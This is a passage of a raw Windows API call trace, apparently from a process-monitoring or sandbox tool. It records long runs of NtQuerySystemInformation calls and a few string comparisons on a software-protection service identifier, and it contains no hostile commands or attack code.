NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0288.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0288.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0288.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0288.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0288.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0288.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0288.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0288.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0288.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0288.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.239] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0288.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce98, Length=0x50, ResultLength=0x0) [0288.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x38, ResultLength=0x0) [0288.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x28, ResultLength=0x0) [0288.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x28, ResultLength=0x0) [0288.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x28, ResultLength=0x0) [0288.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x28, ResultLength=0x0) [0288.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x38, ResultLength=0x0) [0288.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x28, ResultLength=0x0) [0288.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x28, ResultLength=0x0) [0288.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x38, ResultLength=0x0) [0288.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x20, ResultLength=0x0) [0288.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0288.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0288.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0288.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x38, ResultLength=0x0) [0288.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x20, ResultLength=0x0) [0288.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x20, ResultLength=0x0) [0288.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x20, ResultLength=0x0) [0288.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1a8, Length=0x50, ResultLength=0x0) [0288.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d120, Length=0x28, ResultLength=0x0) [0288.254] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0288.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1a8, Length=0x50, ResultLength=0x0) [0288.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1a8, Length=0x50, ResultLength=0x0) [0288.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d090, Length=0x50, ResultLength=0x0) [0288.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d010, Length=0x28, ResultLength=0x0) [0288.255] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0288.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d090, Length=0x50, ResultLength=0x0) [0288.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d090, Length=0x50, ResultLength=0x0) [0288.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d090, Length=0x50, ResultLength=0x0) [0288.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x38, ResultLength=0x0) [0288.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x28, ResultLength=0x0) [0288.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x28, ResultLength=0x0) [0288.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x28, ResultLength=0x0) [0288.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce60, Length=0x28, ResultLength=0x0) [0288.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x38, ResultLength=0x0) [0288.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cee0, Length=0x28, ResultLength=0x0) [0288.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cee0, Length=0x28, ResultLength=0x0) [0288.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x38, ResultLength=0x0) [0288.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x20, ResultLength=0x0) [0288.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x20, ResultLength=0x0) [0288.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x20, ResultLength=0x0) [0288.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x20, ResultLength=0x0) [0288.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x38, ResultLength=0x0) [0288.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x20, ResultLength=0x0) [0288.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x20, ResultLength=0x0) [0288.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x20, ResultLength=0x0) [0288.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.277] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xa78207d0f0 | out: lpSystemTimeAsFileTime=0xa78207d0f0*(dwLowDateTime=0x39299383, dwHighDateTime=0x1d6666a)) [0288.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1a8, Length=0x50, ResultLength=0x0) [0288.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e0, Length=0x28, ResultLength=0x0) [0288.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cff8, Length=0x50, ResultLength=0x0) [0288.277] GetTickCount () returned 0x1188192 [0288.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec8, Length=0x58, ResultLength=0x0) [0288.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0288.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0288.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0288.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0288.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0288.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0288.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0288.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0288.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0288.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0288.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0288.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0288.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0288.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0288.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0288.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0288.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0288.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0288.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec8, Length=0x58, ResultLength=0x0) [0288.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0288.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0288.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0288.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0288.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0288.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x28, ResultLength=0x0) [0288.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0288.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0288.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x28, ResultLength=0x0) [0288.309] NtQuerySystemInformation 